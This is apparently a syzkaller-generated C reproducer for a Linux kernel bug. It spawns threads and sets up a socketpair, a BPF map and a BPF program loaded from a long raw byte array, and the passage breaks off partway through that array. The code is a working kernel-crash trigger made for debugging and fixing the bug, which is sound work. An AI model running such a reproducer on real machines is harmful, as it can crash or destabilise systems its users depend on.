// https://syzkaller.appspot.com/bug?id=d5f63be97bcf572595613d19f9b82475e37c9026 // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef __NR_bpf #define __NR_bpf 321 #endif static void sleep_ms(uint64_t ms) { usleep(ms * 1000); } static uint64_t current_time_ms(void) { struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &ts)) exit(1); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000; } static void use_temporary_dir(void) { char tmpdir_template[] = "./syzkaller.XXXXXX"; char* tmpdir = mkdtemp(tmpdir_template); if (!tmpdir) exit(1); if (chmod(tmpdir, 0777)) exit(1); if (chdir(tmpdir)) exit(1); } static void thread_start(void* (*fn)(void*), void* arg) { pthread_t th; pthread_attr_t attr; pthread_attr_init(&attr); pthread_attr_setstacksize(&attr, 128 << 10); int i = 0; for (; i < 100; i++) { if (pthread_create(&th, &attr, fn, arg) == 0) { pthread_attr_destroy(&attr); return; } if (errno == EAGAIN) { usleep(50); continue; } break; } exit(1); } typedef struct { int state; } event_t; static void event_init(event_t* ev) { ev->state = 0; } static void event_reset(event_t* ev) { ev->state = 0; } static void event_set(event_t* ev) { if (ev->state) exit(1); __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE); syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000); } static void event_wait(event_t* ev) { while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE)) syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0); } static int event_isset(event_t* ev) { return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE); } static int event_timedwait(event_t* ev, uint64_t timeout) { uint64_t start = current_time_ms(); uint64_t now = start; for (;;) { uint64_t remain = timeout - (now - start); struct timespec ts; ts.tv_sec = remain / 1000; ts.tv_nsec = (remain % 1000) * 1000 * 1000; syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts); if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE)) return 1; now = current_time_ms(); if (now - start > timeout) return 0; } } static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true; } #define FS_IOC_SETFLAGS _IOW('f', 2, long) static void remove_dir(const char* dir) { int iter = 0; DIR* dp = 0; const int umount_flags = MNT_FORCE | UMOUNT_NOFOLLOW; retry: while (umount2(dir, umount_flags) == 0) { } dp = opendir(dir); if (dp == NULL) { if (errno == EMFILE) { exit(1); } exit(1); } struct dirent* ep = 0; while ((ep = readdir(dp))) { if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0) continue; char filename[FILENAME_MAX]; snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name); while (umount2(filename, umount_flags) == 0) { } struct stat st; if (lstat(filename, &st)) exit(1); if (S_ISDIR(st.st_mode)) { remove_dir(filename); continue; } int i; for (i = 0;; i++) { if (unlink(filename) == 0) break; if (errno == EPERM) { int fd = open(filename, O_RDONLY); if (fd != -1) { long flags = 0; if (ioctl(fd, FS_IOC_SETFLAGS, &flags) == 0) { } close(fd); continue; } } if (errno == EROFS) { break; } if (errno != EBUSY || i > 100) exit(1); if (umount2(filename, umount_flags)) exit(1); } } closedir(dp); for (int i = 0;; i++) { if (rmdir(dir) == 0) break; if (i < 100) { if (errno == EPERM) { int fd = open(dir, O_RDONLY); if (fd != -1) { long flags = 0; if (ioctl(fd, FS_IOC_SETFLAGS, &flags) == 0) { } close(fd); continue; } } if (errno == EROFS) { break; } if (errno == EBUSY) { if (umount2(dir, umount_flags)) exit(1); continue; } if (errno == ENOTEMPTY) { if (iter < 100) { iter++; goto retry; } } } exit(1); } } static void kill_and_wait(int pid, int* status) { kill(-pid, SIGKILL); kill(pid, SIGKILL); for (int i = 0; i < 100; i++) { if (waitpid(-1, status, WNOHANG | __WALL) == pid) return; usleep(1000); } DIR* dir = opendir("/sys/fs/fuse/connections"); if (dir) { for (;;) { struct dirent* ent = readdir(dir); if (!ent) break; if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) continue; char abort[300]; snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name); int fd = open(abort, O_WRONLY); if (fd == -1) { continue; } if (write(fd, abort, 1) < 0) { } close(fd); } closedir(dir); } else { } while (waitpid(-1, status, __WALL) != pid) { } } static void setup_test() { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); write_file("/proc/self/oom_score_adj", "1000"); if (symlink("/dev/binderfs", "./binderfs")) { } } struct thread_t { int created, call; event_t ready, done; }; static struct thread_t threads[16]; static void execute_call(int call); static int running; static void* thr(void* arg) { struct thread_t* th = (struct thread_t*)arg; for (;;) { event_wait(&th->ready); event_reset(&th->ready); execute_call(th->call); __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED); event_set(&th->done); } return 0; } static void execute_one(void) { if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } int i, call, thread; for (call = 0; call < 6; call++) { for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) { struct thread_t* th = &threads[thread]; if (!th->created) { th->created = 1; event_init(&th->ready); event_init(&th->done); event_set(&th->done); thread_start(thr, th); } if (!event_isset(&th->done)) continue; event_reset(&th->done); th->call = call; __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); event_set(&th->ready); if (call == 3) break; event_timedwait(&th->done, 50); break; } } for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++) sleep_ms(1); } static void execute_one(void); #define WAIT_FLAGS __WALL static void loop(void) { int iter = 0; for (;; iter++) { char cwdbuf[32]; sprintf(cwdbuf, "./%d", iter); if (mkdir(cwdbuf, 0777)) exit(1); int pid = fork(); if (pid < 0) exit(1); if (pid == 0) { if (chdir(cwdbuf)) exit(1); setup_test(); execute_one(); exit(0); } int status = 0; uint64_t start = current_time_ms(); for (;;) { sleep_ms(10); if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) break; if (current_time_ms() - start < 5000) continue; kill_and_wait(pid, &status); break; } remove_dir(cwdbuf); } } uint64_t r[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff}; void execute_call(int call) { intptr_t res = 0; switch (call) { case 0: res = syscall(__NR_socketpair, /*domain=*/1ul, /*type=SOCK_SEQPACKET*/ 5ul, /*proto=*/0, /*fds=*/0x20000040ul); if (res != -1) r[0] = *(uint32_t*)0x20000040; break; case 1: *(uint32_t*)0x20000740 = 3; *(uint32_t*)0x20000744 = 4; *(uint32_t*)0x20000748 = 4; *(uint32_t*)0x2000074c = 0xa; *(uint32_t*)0x20000750 = 0; *(uint32_t*)0x20000754 = 0; *(uint32_t*)0x20000758 = 0; memset((void*)0x2000075c, 0, 16); *(uint32_t*)0x2000076c = 0; *(uint32_t*)0x20000770 = -1; *(uint32_t*)0x20000774 = 0; *(uint32_t*)0x20000778 = 0; *(uint32_t*)0x2000077c = 0; *(uint64_t*)0x20000780 = 0; *(uint32_t*)0x20000788 = 0; *(uint32_t*)0x2000078c = 0; res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x20000740ul, /*size=*/0x50ul); if (res != -1) r[1] = res; break; case 2: *(uint32_t*)0x20000080 = 1; *(uint32_t*)0x20000084 = 5; *(uint64_t*)0x20000088 = 0x20000540; memcpy( (void*)0x20000540, "\xbf\x16\x00\x00\x00\x00\x00\x00\xb7\x07\x00\x00\x00\x01\x00\x00\x48" "\x70\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x95\x00" "\x00\x00\x00\x00\x00\x00\x2b\xa7\x28\x04\x15\x98\xfb\xd3\x0c\xb5\x99" "\xe8\x3d\x24\xa3\xaa\x81\xd3\x6b\xb3\x01\x9c\x13\xbd\x23\x21\x2f\xb5" "\x6f\xa5\x4f\x26\x41\xd8\xb0\x2c\x38\x15\xe7\x9c\x14\x14\xeb\x07\xea" "\xe6\xf0\x71\x1e\x6b\xd9\x17\x48\x79\x60\x71\x71\x42\xda\x76\x46\xc4" "\xfe\x02\x99\x6b\x60\xcf\x81\xeb\xcd\x50\xfa\x9e\xa4\x31\x81\x23\xf6" "\x02\x00\x00\x00\x00\x00\x00\xde\x89\xe6\x61\x16\x8c\x18\x86\xd0\xd4" "\xd9\x4f\x20\x4e\x34\x5c\x65\x2f\xbc\x16\x26\xe3\xa2\xa2\xad\x35\x80" "\x61\xd0\xae\x02\x09\xe6\x2f\x51\xee\x98\x8e\x6e\xa6\x04\xce\x97\x4a" "\x22\xa5\x50\xd6\xf9\x70\x80\x98\x04\x00\x00\x3e\x05\xdf\x3c\xeb\x9f" "\x1f\xea\xe5\x73\x7e\xca\xa8\x0a\x66\x69\x63\xc4\x74\xc2\xa1\x00\xc7" "\x88\xb2\x77\xbe\xee\x1c\xbf\x9b\x0a\x4d\x38\x81\xdc\xc7\xb1\xb8\x5f" "\x3c\x3d\x44\xae\xac\xcd\x36\x41\x11\x0b\xec\x4e\x90\xa6\x34\x19\x65" "\xc3\x9e\x4b\x34\x31\xab\xe8\x02\xf5\xab\x3e\x89\xcf\x6c\x66\x2e\xd4" "\x04\x8d\x3b\x3e\x22\x27\x8d\x00\xce\x00\x00\x00\x00\xd3\xa0\x27\x62" "\xc2\x95\x12\x57\xb8\x58\x02\x18\x9d\x74\x00\x5d\x2a\x1b\xcf\x94\x36" "\xe1\x92\xe2\x3f\xd2\x75\x98\x5b\xf3\x1b\x71\x4f\x00\x0b\xca\xb6\xfc" "\xd6\x10\xf2\x5f\x58\x88\x00\x00\x00\x00\x3f\x11\xaf\xc9\xbd\x08\xc6" "\xeb\xfb\xb8\x94\x32\xfb\x46\x5b\xc5\x2f\x49\x12\x9b\x9b\x61\x50\xe3" "\x20\xc9\x90\x1d\xe2\xeb\xb9\x00\x00\x00\x01\x8e\x30\x95\xc4\xc5\xc7" "\xa1\x56\xce\xc3\x3a\x66\x7d\xcc\xaf\xf9\x50\xca\x1e\x5e\xfd\xd4\xc9" "\x68\xda\xcf\x81\xba\xa3\xa5\x09\xb1\x04\x1d\x06\xf6\xb0\x09\x7c\x43" "\x04\x81\x82\x4a\x3f\x4f\xdd\xd3\xc6\x43\xf6\x30\xba\x17\x5d\x87\x6d" "\xef\xd3\x54\x17\x72\xf2\x6e\x27\xc4\x4c\xfd\xb2\xd8\x5d\x6d\x29\x98" "\x3e\x83\x0a\x9c\xdd\x79\x83\x7b\x34\x68\xe8\xc6\x7a\x57\x1d\x0a\x01" "\x7c\x10\x03\x44\xc5\x2a\x6f\x38\x7a\x13\x40\xa1\xc8\x88\x94\x64\xf9" "\x0c\xc4\xcd\x1f\x57\x0d\xd3\x98\x77\xdf\xb2\xff\x1a\xe6\x6e\x1c\xe9" "\x17\x47\x4b\x2e\x65\x0a\xe6\x30\xaf\xd0\x14\xa3\x37\xac\x5d\x58\xbc" "\xb5\xe5\x17\x23\x25\x7c\x87\x2c\x52\x55\xf2\x01\x00\x00\x00\x00\x00" "\x00\x00\xf0\x41\xb6\x65\xab\x21\x37\x2c\x8d\x8b\x7b\xac\x5b\x5c\x78" "\x4d\x20\xa4\xa2\x4d\x8d\xbd\x75\x06\x2e\x1d\xae\xf9\xde\xad\x61\x9c" "\xc6\xe7\xba\xa7\x27\x07\x15\x77\x91\xc3\xd2\xa2\x86\xff\xb8\xd3\x54" "\x52\xbb\x5d\x36\xc2\xa8\x68\x2b\xf7\xec\xbd\x53\xf9\x50\xef\x47\x09" "\xec\x01\xe2\x30\xd2\xf5\x35\x94\xef\x48\x39\xc6\x13\x0c\x4c\x13\xa0" "\xcc\xa8\x4b\x99\x35\xf7\x71\xfd\x49\xe4\x80\xcd\x9d\x48\xae\xb1\x2b" "\x1d\x25\x5b\xe1\xed\x66\xd9\x05\x1f\x22\x61\x4d\x1f\x62\x73\x4d\x67" "\x90\x39\xa9\x7d\x2b\x74\xf9\xe8\xe9\x97\xcc\xd3\x14\x00\x0f\x74\x7f" "\x4e\x8e\x70\x25\x12\x3e\x78\x3d\xf8\xb8\xa1\x7e\x3a\xa9\xfe\x1f\x66" "\x2a\xef\x87\xa0\x65\xb0\x3c\xfb\x65\xb4\xdf\xe4\xf1\xb5\x6e\x1f\x23" "\x12\x8d\x74\x37\x53\xa1\xde\x17\x2d\x68\x3d\x58\x92\xce\x94\x14\xa1" "\xd9\x8e\xa9\x3e\x3d\x35\xdb\xb6\xc2\x3b\x90\xcf\x36\xe8\x3b\x8a\x43" "\x4a\x97\xd0\x93\x43\xd7\xf8\x30\x79\xcc\xb0\x2e\x69\xd3\x84\x14\x60" "\x56\xd1\x25\xcf\xa7\x88\x23\x78\x74\xdd\x42\xda\xe3\x34\xbd\xa0\x42" "\x81\x9a\x2a\xa2\x4d\xba\x1c\x25\xbe\x27\x94\x44\x8b\x4f\x63\x48\x30" "\x26\xb5\xe3\x4d\x44\x70\x5b\x76\xef\x29\x24\x1a\xda\xb0\xdd\x7d\x68" "\xbf\x97\x5e\x02\x06\x9f\x6f\x24\x25\xe1\xbc\x97\xa3\xd5\x88\x08\x5f" "\x16\xbe\xf6\x3a\x06\x57\x8d\x4f\x5d\xe7\xbf\xb6\xaa\xa7\x5f\x16\x99" "\x6d\x53\x62\x56\xc0\x22\x84\xcb\x1d\x3a\x6f\xb8\xca\xe8\x76\x91\xfa" "\xe3\x65\xa7\x0c\x3f\xc6\x9e\x15\x65\xbb\xa8\xdd\x8a\x8c\xa0\x49\xf7" "\x98\xab\xe6\x46\xf7\x38\xbe\xbd\x69\x41\x3a\xfc\x9d\x8a\x5e\xdd\x7a" "\xaa\x00\x00\x00\x00\x00\x00\x00\x1e\x6c\x2f\x2a\x28\x7c\x52\x78\xa2" "\x18\xdb\xfa\xff\xff\xff\x00\xa1\x4d\xb5\xcf\xa6\x81\x9e\xb1\xd3\x9c" "\x48\xcf\xdc\x80\xd2\x15\xc9\xe1\x6e\x0c\x47\x36\xc8\x19\x36\x31\x54" "\xcc\xa4\xe2\xf8\x98\x00\xd1\x8c\x89\xd7\xf4\x6f\x67\x9d\xf6\xc9\xe2" "\x95\x2a\xe1\xeb\xfd\x0c\xa8\x83\x68\xee\x6c\xe1\x39\xe8\xb5\x82\x2c" "\x22\xcf\x2e\x9d\xde\x94\x3d\x34\xc4\x32\xe1\x00\x11\x71\x79\x2c\x65" "\x98\x61\x46\x66\x6a\x54\x90\x92\x84\x41\xf4\x7e\x0f\xe5\xea\xc4\x18" "\x24\xca\x1f\xd0\xeb\x71\xaa\x24\x3c\x88\xd5\x48\x0e\x5a\xee\x9c\x9e" "\x5f\x2e\x5a\x56\xa6\xd9\x20\x33\x5c\x8e\x87\x26\xfd\x83\x29\xd9\xa7" "\x28\x99\x5b\x15\x31\xbd\x20\x36\x0d\x33\xd8\xf9\xff\xff\xff\x5f\x91" "\x2a\xc4\xe3\x4b\xf6\xea\x8a\x86\xda\x70\x7b\x03\xbd\xdb\x49\x1b\xa0" "\xcc\x98\xf6\xbe\x92\xc5\x59\x69\xa2\xb5\x00\x25\x41\x9d\x14\x76\xc7" "\x31\x32\xca\x7c\xa2\x6c\xe8\xa7\xe3\xff\xb7\x00\xf0\x9e\x15\x7f\x9b" "\x84\x40\x51\xf1\xa6\x42\xac\xa9\xff\x98\xc9\x03\x64\x71\xcc\xff\x05" "\x22\x90\x3e\x7b\xcf\x62\xe1\x8f\x76\x96\xbb\xc2\x80\xb9\x5e\x8e\x0d" "\x6f\xd5\x64\x4b\x0e\xbd\xe3\xa9\x5b\x06\x54\x88\x62\xde\x80\x9d\x3d" "\xae\x3c\xcc\xf1\x09\xf7\xc7\x8e\x84\x79\xa3\x45\xe8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x94\x55\xbf\x41\x76\x27\xce\x72\x3a\x5d" "\x91\x03\x70\x6a\xba\x69\x27\x95\x00\xbb\x82\xf6\xb5\xa3\xdd\xc0\xbd" "\x98\x56\x71\x29\x45\xb7\x0c\x75\xce\x5b\x72\x25\x78\x82\x08\x20\xd0" "\x10\xd7\xa3\xcf\xfc\x99\xfc\x64\x7d\x0b\x82\xef\x26\xab\x70\x8c\x0b" "\x19\xed\x14\x4b\xe5\x1c\x3b\x39\x8f\x0e\x6b\xb7\xa3\x00\x06\x00\x00" "\x00\xcb\xa1\x29\x53\xd5\x8c\xff\x0f\x03\x78\x74\x0f\xe6\x66\x2f\x37" "\x7b\x97\xd8\xe7\xcd\xb0\x47\x05\x0d\x72\x96\xcd\x38\x56\x47\x6a\x60" "\xa4\x9a\xd1\x27\xba\x65\x70\xba\xfc\x2b\xbc\xf9\xee\x72\x1f\xd9\xcb" "\x46\x7f\xf0\x71\xe5\x60\x4f\xbf\x04\x91\x24\x5c\x00\x00\x00\x7d\x93" "\x2d\x7a\x64\xde\x4c\x4a\xa4\x33\xfc\x08\x40\xaf\xf7\xc4\x7d\xa3\xa4" "\xc6\x96\x6d\x00\x00\x00\x00\x00\x00\x00\x00\xf6\xbf\xba\xe2\x9e\x8a" "\x6e\x2a\x88\x9f\x6e\xf6\x86\x9d\x82\xd6\xbd\x73\xeb\x76\xb6\x5c\x7a" "\x35\xa5\x4a\x4a\x6b\x8a\xd4\x60\x0e\x3a\x97\x2a\x0b\xb5\x97\x1a\x5f" "\x16\x59\x0b\x0a\x03\xda\xfa\x3f\xd1\x11\x87\x65\xcc\x8a\xb9\xfc\xcf" "\x3b\x51\xc4\x1a\x33\x9f\x20\x0f\x2f\xa3\x30\x06\x91\x0a\x67\x9a\x9a" "\xe0\x18\x7b\x4d\x75\x0c\x4b\xd2\x44\xcb\x0c\xbf\xd2\x3b\x26\x5f\x4d" "\x4d\xa4\x48\xa7\xa0\xd1\x9c\x5e\x43\xea\xe5\x0a\x31\x60\x9d\xfa\x2d" "\xde\x26\x75\x51\x46\x7e\xb6\x47\x52\x93\xdd\x70\x12\xcc\x44\x90\x09" "\x98\x1f\x22\x82\x0e\x57\xa0\xef\xf2\x34\xcc\xfe\x21\xd7\xa2\x30\x2e" "\x00\x06\x69\x75\x3d\x3c\x34\x32\xcc\x14\xee\x1a\xbe\x72\x4a\xdb\x6b" "\x54\x31\xbe\xfe\xdd\x3e\x22\x97\x11\x18\xf0\xe2\x1a\xed\x03\xa6\xfe" "\x78\x60\xb3\xe1\x3c\x31\x73\xa6\x0a\x18\x23\xcb\x7d\xde\x82\x12\xa8" "\x53\x1b\xd9\x69\x1d\xd4\xcc\x6a\x37\x0e\x9e\xb5\x6b\x3d\x79\x0b\x98" "\xf2\xbd\x0d\xb1\xe5\xde\x6a\x14\x65\x97\xb2\xcb\xb7\x10\x30\x40\xd2" "\xa3\x9d\x79\x65\xd3\x4d\xf5\x24\xb7\x60\xab\x92\xef\xcc\xe7\xdd\x15" "\x74\x05\x2c\x73\x59\x35\xbf\x6a\x75\x2c\x01\x5c\x7f\x5f\xfe\xe9\xff" "\x66\xe5\xdd\x28\x66\xb1\x5b\x6e\x0d\x17\x61\x8c\xb1\xf5\xc1\xee\x4b" "\x05\xeb\xf1\x44\x5e\xa1\x10\xf4\x99\xf8\x40\xa5\xc9\x65\x44\x3d\x72" "\x55\x56\x35\x1e\xe2\x5f\xe0\x9f\x69\x49\x4b\x05\x36\x78\xdc\xad\xcf" "\x02\xe0\x63\xdf\xf2\xfa\x4b\xef\x1a\xc3\xbb\xbe\xbe\x6c\x74\xd7\x1e" "\xc3\xb2\x3e\x29\x89\x5e\xff\x1d\x10\x17\x02\x4f\xe3\xe8\xcc\x75\x9b" "\x05\x78\x5a\xdc\x34\x6b\x7f\xfd\x05\x96\x3f\x92\xc1\xd0\xd7\xd9\x0b" "\xa8\x78\xad\x89\xe4\x90\xf3\xe2\x9a\xc5\x1d\x30\x63\x28\x69\xa5\x34" "\x41\x8f\x91\x6b\xf6\xfe\x81\x67\x82\x7a\x8e\x6c\x8f\x8b\x39\x1c\x82" "\x28\x05\xcb\x0a\xdf\x1b\x8b\xd6\x94\x7f\xf2\x08\x75\x3e\xb0\xd2\x08" "\xce\x14\xf7\xb2\x06\xb2\xe0\x2c\x21\xe9\x63\xab\xc5\xce\xb7\x35\xc1" "\xb3\xc4\x6b\x0a\x84\x3d\xe5\x2a\x00\x00\x00\x00\x00\x00\x00\x01\xee" "\x9c\x2b\x27\x05\xc1\xa8\x1d\x9d\x3b\x96\x56\xb2\x19\xc8\xcd\x99\xc9" "\xca\xfc\xd0\xd0\x54\x08\x84\xd9\x7a\xec\xb1\x99\x83\xfc\x6a\xf2\x9a" "\xb4\x4a\x82\xaf\xf9\xcb\xa9\x21\x19\x2c\x66\x5b\x87\x7a\xf6\x53\x9b" "\xdb\x1b\x56\x7f\x48\x1b\xa0\x79\x82\xe7\xad\x75\x8f\x4e\x1e\xac\x69" "\xe7\xe8\x8a\x63\x96\x09\x75\xf4\x90\xe1\x61\xe3\x71\xec\x85\x34\x79" "\x1e\x3b\x61\xc6\x85\xd9\x00\xa9\xc0\x83\x92\x08\x35\x6b\x53\x75\x0e" "\x76\xfc\xc3\xc2\xd1\xbd\xdc\xbd\x83\x89\x79\x21\x41\x4d\x0c\x02\xe8" "\x18\x8f\x3d\xf7\x9e\xa2\xa5\xc5\x44\x40\x04\x83\x0e\x6c\xb2\x27\xca" "\x1b\xda\xfb\x97\x7c\x00\x00\x00\x00\x00\x3a\x41\x71\x93\xb8\xc5\xd7" "\x93\x68\x73\x35\xa9\x30\x86\x70\x94\xfd\x6a\x78\x21\x82\x18\xe0\x4b" "\x70\x5e\xc6\x2f\x16\x08\xcb\x56\x9b\x81\x91\x4e\x68\xf1\x75\xb3\x92" "\xaf\x6b\xc4\xfd\x21\x21\xd7\xfd\x27\x6a\xf2\xc9\x7a\x44\x1b\x56\xe7" "\xa0\x68\x7d\x98\xb8\xe7\x6d\x8d\x0d\x23\x1e\x4f\xe0\x0b\xe1\xde\x76" "\xbd\x19\xcc\x12\xe2\xbd\x93\x8e\xb6\x81\xed\x6b\xc9\x51\xc1\xb4\xf7" "\xc5\x1a\xf5\x9e\xea\x4d\x40\xc6\x00\x00\x00\x00\x02\x00\x77\x8a\x67" "\x7b\x72\x78\x63\x11\x15\x32\x71\xa3\x31\x3d\xa0\x26\x45\xe1\x17\x61" "\x69\x9e\x4d\x04\xac\x86\xdd\x14\xff\x7b\x9a\x10\xd3\xfa\x74\x69\x6f" "\xe3\x95\x3a\x5b\x77\x06\xbf\x5d\x1f\xab\xa4\xb1\x88\x08\xd9\xcb\x0e" "\x9d\xb6\x96\xde\xc4\xe0\x82\x0e\xe4\x02\x8d\x72\x25\xa2\xc9\xc4\x27" "\xcf\x64\xcb\xde\x6f\xba\x05\x6b\x20\x06\xb7\xa3\x7c\x11\x81\xd5\x30" "\xfb\x86\x5e\x23\x5c\xd3\x02\xf3\xb4\x07\x1e\xe5\x23\x7a\xda\x18\x6b" "\x9e\x5e\x31\x44\xbf\x47\x9f\x27\x7f\x10\x65\x6a\xd3\x74\x40\x37\xcc" "\xc9\xc6\x36\x85\xa6\xf1\x10\x9d\x2e\xa7\x37\x73\xd3\x63\x5f\x61\x49" "\x7f\x1f\xa1\xea\x4a\x16\xf6\x01\x80\x0b\xf3\xe5\x91\x41\xfb\xf0\x5a" "\x96\x11\x33\x20\xc4\x45\xf9\xba\x85\x96\x97\x0d\x52\x54\x72\x7e\x80" "\x4f\xbd\x99\xcc\xef\xb7\xc0\x92\x69\xdd\x2c\x5c\x25\xe5\x6e\x16\x9a" "\xc1\x59\x80\xf3\xf8\x5f\x7c\xa3\x6d\xd5\x95\x0e\xf5\xb6\x4f\xd4\x6f" "\x12\x33\x11\x82\x95\x34\xa8\x29\x40\x99\x41\x99\xb3\xcf\x7a\x8f\x09" "\xc1\x94\x6e\x55\x28\x9f\x66\x8c\x42\x3f\xcb\xb3\x1a\xe9\x18\x64\xc8" "\x82\x31\x31\x51\x74\x1a\x67\x53\x8c\x96\x89\xdc\x8e\xcc\x99\x03\xc7" "\x04\x1e\x5c\x07\x04\xe2\xfa\x55\xa7\x56\x48\x75\x17\xa7\x44\x5c\xbd" "\x9e\x3f\x51\x75\xe4\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xbf\x98\xef\xd5\x87\xff\xfe\x32\x6f\x47\x4b\x0b\x08\x9c\x01" "\x7b\x16\xc0\x06\x2c\xbc\xe9\x6f\x5a\xde\xbe\xc5\x2a\x79\xf9\x36\x39" "\x09\x84\x2f\x79\xc5\x0a\x15\x20\xbe\x46\xd8\x70\x03\x13\x7e\x4c\x50" "\x31\xf0\x01\x23\xe8\x12\xa5\xe3\x7c\xd5\x2c\x9e\xb7\x33\x62\x81\xcb" "\x8c\x6c\xe9\x93\x4b\x15\x7d\x78\x75\xa7\x0e\xaf\x10\x3c\xb3\x13\x8e" "\x23\x61\xc5\x1c\xd1\xea\xb8\xa2\x6b\x23\x2a\xcf\x6b\xf0\xab\x82\x9c" "\x26\xda\xb6\x37\x53\x8b\x2e\xb1\x42\x0d\x81\x2d\x2b\x80\xc7\x77\x71" "\x0b\xa0\xf1\x8e\x46\x61\x68\x1a\xa2\x18\xd9\xba\x54\x02\x3a\xb4\x30" "\x5d\x77\xeb\x15\x61\x1a\xe2\x54\x58\x35\xe9\xd3\x0e\x9f\x6d\x4f\xb4" "\x3a\x29\x1c\x69\x54\x5a\x1e\xea\x0f\x87\x20\x43\x11\x32\xd8\x54\x9f" "\x99\xbf\x6c\x5c\xb0\x60\xda\x70\xcb\xb5\x9d\x0a\x00\x00\x00\x00\x00" "\x34\xd0\x83\xfc\x37\xd2\x44\x9f\x72\xde\x0c\xbe\xa4\xbc\x1d\xc8\x9c" "\x13\x6c\xdb\xc5\x04\xf8\x49\xd5\x50\x2d\x77\xa9\x5c\x7b\xff\xf4\xcd" "\x9c\x03\x05\x8d\x0d\x4d\x07\xea\x64\x82\x4f\x1a\xcf\x2b\x39\x28\x9f" "\x67\x5f\x39\xd0\x17\x19\xcd\xba\xb3\xf1\xce\x10\x60\x9c\x8d\x7b\x3e" "\x37\xcb\x99\xb4\x1d\xa5\xe4\x85\xa4\x41\xb6\xa1\x03\x54\x9f\x55\xab" "\x09\xdc\x98\x76\x77\x63\xd1\xf2\xfa\xfd\x45\xbb\x7d\x2b\x40\x05\x0d" "\x1f\x82\x92\xf4\xd9\xec\x6d\x00\x00\x00\x00\x00\x00\x39\x32\x06\x22" "\x90\xf4\x99\x6f\xdd\x55\xb0\x60\x23\x43\x7e\x9e\x20\x72\xda\xf7\xf5" "\xd8\x2f\x6f\x1b\x5b\x89\xa4\x11\x34\xf4\xdc\x2e\x65\xbb\x11\x27\x2f" "\xdf\x8c\x81\x41\xf4\x1d\x61\x60\xb3\xd8\xb6\xec\xd1\x6d\x14\x26\x7f" "\x61\xb4\x88\x1a\xde\xe7\xf0\x7f\x3d\x6a\xf5\xae\x79\xe1\x6f\xe2\xc3" "\xf5\x5a\xc7\xa6\x39\x2d\x2e\x1d\x9b\x42\x86\xb6\xc3\xe1\xf5\xa7\x6b" "\x85\xed\x6e\x1f\x00\x00\xc6\x7e\x6c\x5f\xcd\xc8\xc3\x93\x81\xbe\x47" "\x99\xb8\xcb\x2d\x08\xb8\x26\x2c\x80\x7d\xd7\x55\xe2\x2b\x80\x11\x62" "\x38\x1a\xa9\xd1\xaf\x2b\xbc\x9c\xfd\x49\x75\x85\x33\x7e\xac\x40\x8b" "\x84\x75\xb4\x7a\x39\x2a\x10\xca\xe3\x49\x16\x0f\x12\x8e\x5f\x87\x3a" "\x58\x06\x4e\xb4\x00\xc3\x6a\x90\x62\x4f\x6a\xed\x39\x8a\x21\x5e\x9c" "\xe6\x45\x22\xab\x24\x9f\x67\xc3\x8a\x65\x6d\x32\xec\xff\x5c\xdb\x2b" "\x03\x9c\x4a\xbf\x34\x9d\x2c\x0f\x88\xa4\x2e\x91\x89\xbb\xfa\x7f\x5c" "\xf3\x5b\x6e\x7e\xf8\xf9\xd3\x31\x63\xb7\xea\x87\x55\x0f\xb1\xba\x33" "\x4c\x83\xe3\xae\xc4\x71\x4c\x9c\x4c\xa3\xec\xb0\x4f\x27\x20\x23\x76" "\x15\xa2\x8b\xf3\x10\xb5\x8f\xfa\x2a\x10\x32\x16\xfd\xcc\x8c\x2d\x8f" "\x5d\x55\xe5\xe7\xeb\xf1\x47\x10\x52\x72\xaa\xae\x56\xe8\x6d\x85\x6b" "\x3c\xf7\x9a\x3f\x73\x06\x43\x67\x62\xdd\x07\xce\xbc\x78\x92\xec\x6f" "\x9f\x69\x6d\xa3\x8f\xee\xd3\xdc\x00\x01\x50\x0e\x34\xad\xae\x1b\xa8" "\x9a\x32\xba\xd2\xaf\x90\x30\xf8\x40\xf1\xba\x46\x64\xf3\x55\x47\xcd" "\xad\xd5\xcb\xac\xc5\x93\x52\xc2\x90\xf5\x5d\x97\x1b\x65\x95\x35\x33" "\x66\x8c\x25\xf2\x1d\x8d\x62\xd8\x49\xe9\x05\x8e\xaa\x97\xc6\x34\x91" "\x56\x88\x87\x54\x8f\x66\x8c\xdb\xca\x2a\xbf\x01\xa3\x61\xa0\xb6\x4d" 